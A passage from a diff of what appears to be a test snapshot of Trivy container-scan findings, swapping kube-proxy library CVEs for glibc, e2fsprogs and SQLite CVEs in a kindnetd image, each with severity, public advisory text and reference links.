"value": "https://dev.gnupg.org/T4683", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://minerva.crocs.fi.muni.cz/", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-32", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-3", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-1/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-2/", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-3/", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.8.4-5+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-40528", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5311", - "https://access.redhat.com/security/cve/CVE-2021-40528", - "https://bugzilla.redhat.com/2002816", - "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", - "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2022-5311.html", - "https://errata.rockylinux.org/RLSA-2022:5311", - "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", - "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", - "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", - "https://linux.oracle.com/cve/CVE-2021-40528.html", - "https://linux.oracle.com/errata/ELSA-2022-9564.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "ElGamal implementation allows plaintext recovery", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-40528", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5311", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-40528", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2002816", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5311", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", - }, - { - "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-43618", - "installedVersion": "2:6.1.2+dfsg-4", - "packageName": "libgmp10", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1304", + "installedVersion": "1.46.2-2", + "packageName": "libcom-err2", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/8", - "http://www.openwall.com/lists/oss-security/2022/10/13/3", - "https://access.redhat.com/security/cve/CVE-2021-43618", - "https://bugs.debian.org/994405", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", - "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", - "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", - "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", - "https://security.netapp.com/advisory/ntap-20221111-0001/", - "https://ubuntu.com/security/notices/USN-5672-1", - "https://ubuntu.com/security/notices/USN-5672-2", - "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "https://access.redhat.com/errata/RHSA-2022:8361", + "https://access.redhat.com/security/cve/CVE-2022-1304", + "https://bugzilla.redhat.com/2069726", + "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "https://errata.rockylinux.org/RLSA-2022:8361", + "https://linux.oracle.com/cve/CVE-2022-1304.html", + "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "https://ubuntu.com/security/notices/USN-5464-1", + "https://www.cve.org/CVERecord?id=CVE-2022-1304", ], }, "category": "Vulnerability", - "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Integer overflow and resultant buffer overflow via crafted input", + "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43618", + "value": "https://avd.aquasec.com/nvd/cve-2022-1304", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/8", + "value": "https://access.redhat.com/errata/RHSA-2022:8361", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "value": "https://access.redhat.com/security/cve/CVE-2022-1304", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43618", + "value": "https://bugzilla.redhat.com/2069726", }, { "type": "URL", - "value": "https://bugs.debian.org/994405", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", }, { "type": "URL", - "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", }, { "type": "URL", - "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "value": "https://errata.rockylinux.org/RLSA-2022:8361", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", + "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-2", + "value": "https://ubuntu.com/security/notices/USN-5464-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20231", - "installedVersion": "3.6.7-4+deb10u6", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.8", + "packageName": "libdb5.3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20231", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20231.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20231", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gnutls: Use after free in client key_share extension", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20231", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20231", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4019-1/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": 